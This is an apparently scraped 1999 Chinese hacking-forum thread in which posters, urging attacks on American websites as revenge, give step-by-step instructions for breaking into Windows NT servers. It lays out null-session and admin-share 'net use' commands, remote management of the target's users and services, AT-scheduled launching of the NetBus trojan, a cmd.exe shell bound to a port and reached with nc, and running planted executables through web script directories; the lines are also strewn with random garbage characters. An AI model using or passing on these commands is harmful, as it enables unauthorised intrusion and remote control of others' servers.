《版主页黑客工具和文章的几个问题》中提到:9 Q3 Q8 B1 b) a7 H& @5 L+ p5 H7 |5 M( S
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。1 C: A8 R) W) {0 E5 h% I
> 我的机子MMX166,WIN98,2。5G,32M内存。8 m4 x) J: M, s1 o+ j( P1 P" X
, k% F' h- C+ f1 t7 v6 M
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。: W1 [" b8 q0 g( t2 v4 H- a0 R
你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。
' N( \0 s# Y" }9 G0 Z其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:6 i. @) i( \2 v& `/ s/ }1 F
net use \\111.111.111.111\ipc$ "" /user:""
1 F2 [) Q/ ]! G! [5 |7 F4 znet.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:7 N, K T2 S% N$ s
net view \\111.111.111.111
5 u, L, U0 C* u6 N# w# X) z+ O当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
1 f6 c0 O0 ?- ]3 E8 a8 S3 ^5 P; Hnet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
* X$ w/ W) _4 H8 X% t- t& R, `$ n命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:5 k2 H0 T0 r k6 u% _" ~
1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:( W& K) l' J/ _3 D' Z! `
net use x: \\111.111.111.111\c$
/ d4 C# D, B* Xnet use y: \\111.111.111.111\d$" |) e0 ?9 @4 M( W+ `; N. m, I# G6 H
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以..., _' I8 p& s z- s! k2 r
2、管理目标NT的用户:
7 A$ H+ u! N) [# E9 l* Q" }# B从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”% _! p4 d6 W, M/ u. m( q0 ]
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样
. X) g. H& b3 n# ?# t3、管理目标NT的服务
* c" S$ c# R( _. _选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
- M# H9 u& C, Q这样你可以管理目标NT上的服务,共享目录) J8 D1 c6 e* { i" W
4、IIS管理
- o" I/ [7 z8 b: k/ `- T6 N4 K3 \选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
" S) H3 i% P4 q目标NT的FTP、WWW服务你就可以重新配置
; ]; d% j; r( o/ a/ _: w; U5、事件管理
' S% }& j: Y% A" Q) g; d9 q“事件查看器”->连接到服务器->111.111.111.111
1 |( r1 |& T1 A) M9 K3 @+ b0 j" J; n- D$ u/ r
还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
7 Y5 Z% J6 y7 y' C/ a2 [. M' \0 O1 |1 D( F. B2 U' t
当然,98,95也能做一些事情,但很麻烦,比如:
/ _ f9 K: h% f$ f8 Rnet use \\111.111.111.111\ipc$
% `3 y- w! M. a+ }9 Q3 c) F' Nnet use z: \\111.111.111.111\d$
! X. {( T4 z0 d) E* A/ ~5 l但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等4 n7 a. l7 c2 E- J
) K- Y9 ~# e- ^我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!
% |! ?+ G' a8 {- G3 R这样,你还可以了解目标机器上能有什么东东供你去用!) S/ e" B9 B A( \
, {( a9 c; k% z. l$ r- `
+ d" o! a# E5 ~* u/ ]' w2 I0 d--------------------------------------------------------------------------------
9 Y* ]5 h6 @) v/ D$ s4 X% `
/ l. e; `2 i& L- `' |/ P>quack于1999-06-12,23:37:44+ L# a3 \' Z- r' O/ t( t
在大作《几个有关黑的问题》中提到:! p/ z. y3 r9 U0 p, V( @! i
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
7 q% D+ M1 h/ g: ^. }, L T# J- q& J- h& ^' ]" d2 H
killusa于1999-06-13,03:25:15
& F$ z1 f) T6 o- R0 n在大作《Re: 几个有关黑的问题》中提到:) d% M" i; \7 [) p
: y' D, ~8 I: C- a' X4 C; K) I- F# G
letmein.exe 暂时没有mypwd参数,十分抱歉' t: E3 e6 o7 u* \+ t
pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。8 a5 p; A/ \! P/ g) C
( ] y. ?+ S2 y1 V) j% q! oNetbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的+ X/ r/ a* |5 V( ^: x; p! N! P
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:
2 c9 W+ y0 x* s, i7 C9 M6 _/ O! p4 I
1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下: N( h- ^9 ?' @/ x$ b
1 ]2 f. u2 ]$ i* O$ `# k) W7 G8 jC:\>net start schedule, I2 F8 O7 D f7 c; j1 m; v9 |7 h
Schedule 正在启动服务.....
/ \: t! j+ U S @% }Schedulw 服务启动成功。
5 ?& Q$ T" }' q) ?. d% Y/ d: hC:\>at /?! {1 W" G4 C8 M- @2 o
AT 命令排定在特定的日期和时间运行某些命令和程序。3 K& [8 d! q$ \& y" M
运行 AT 命令之前必须先启动 Schedule 服务。
8 x4 m& X6 Y) ~$ ~( F6 g1 T
$ }$ V. k! p% e- M) BAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
4 }! U( Q3 k; H9 m5 ?AT [\\computername] time [/INTERACTIVE]6 K: k3 H$ M! n: Z# Y/ O8 E6 F
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
! t/ d8 g' P: _6 D# |! F3 k; B
; n" i: Y- O: m. z5 O$ u\\computername 指定远程计算机。 如果省略这个参数+ i8 @6 z$ O! a
命令会被排定在本机上运行。* |/ S2 m, K r5 a! u' z/ {
id 指定给排定进度命令的识别号。
9 d# q( I" C ~, d6 D# @- V
5 P+ ?; e/ n" n7 ^/ ~/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。
# b8 O' t2 f; v# E! H/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。
: Q# I1 Q% b0 X* I, r3 Ztime 指定命令运行的时间。- `. ?- ]: P' b$ m, S
/interactive 允许作业在运行时,与用户通过桌面交互。8 M2 ?0 G& a, K5 I
b. a" M3 v' Q6 ^
/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。& i* a) B8 O4 C
如果省略日期,则默认为在每月的本日运行。
; L6 j5 T, u6 r2 ?3 K/ j S8 |" X- C; S% Z
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
- V+ [( ?( y, Z0 N0 B5 J7 K
9 V1 D6 Z, e) \5 R"command" 准备运行的 Windows NT 命令或批处理文件。
, S0 `7 N0 O( T) ], l0 x# ]4 s3 ~" d1 x1 Z4 I8 q- b
C:\>
# Q; e4 y6 ?9 m$ b% E- C: q- Y
% }6 J% t% @' _2 J; F; c知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:$ R2 C/ r3 l% K b {" `
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser", x5 l1 b; M3 e. e0 F6 S X
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
5 h4 I2 c( w X2 U( r3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:. @' ~* f# `7 p& R8 q
at \\x.x.x.x 00:00 ntsrv.exe /port:64321( z; ?! V& J8 V( n" r: @6 _
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:
) D! Y) f) C; y! NMicrosoft(R) Windows NT(TM)
: u, g5 o+ ^! Q(C) Copyright 1985-1996 Microsoft Corp.
. P: U" Q0 A- B# FC:\>: |: n4 [7 V) `4 F! c& G' p3 Z
, x* F, k: O4 H) a- n2、利用web启动ntsrv.exe或其他程序在目的服务器
7 Y+ b" p6 ?& n( w* V3 d
. |% N* l$ i: z0 c2 d2 L: `( U2 C将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
/ c" e& n w, K/ M0 J* ~) khttp://x.x.x.x/scripts/ntsrv.exe /port:64321
$ F2 O) G/ l7 ?) i; |或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321! _$ x) v5 p0 P5 _
该程序就启动了
2 Z. u8 I: S: g, T! W9 y+ f0 }4 S
我只提这几中方法!5 @" {3 z& U8 r8 V
要成功,必须打好基础工,对操作系统充分了解!: b7 t' P ^( ~. E$ X
- @' J: `+ C$ N+ ~) ? |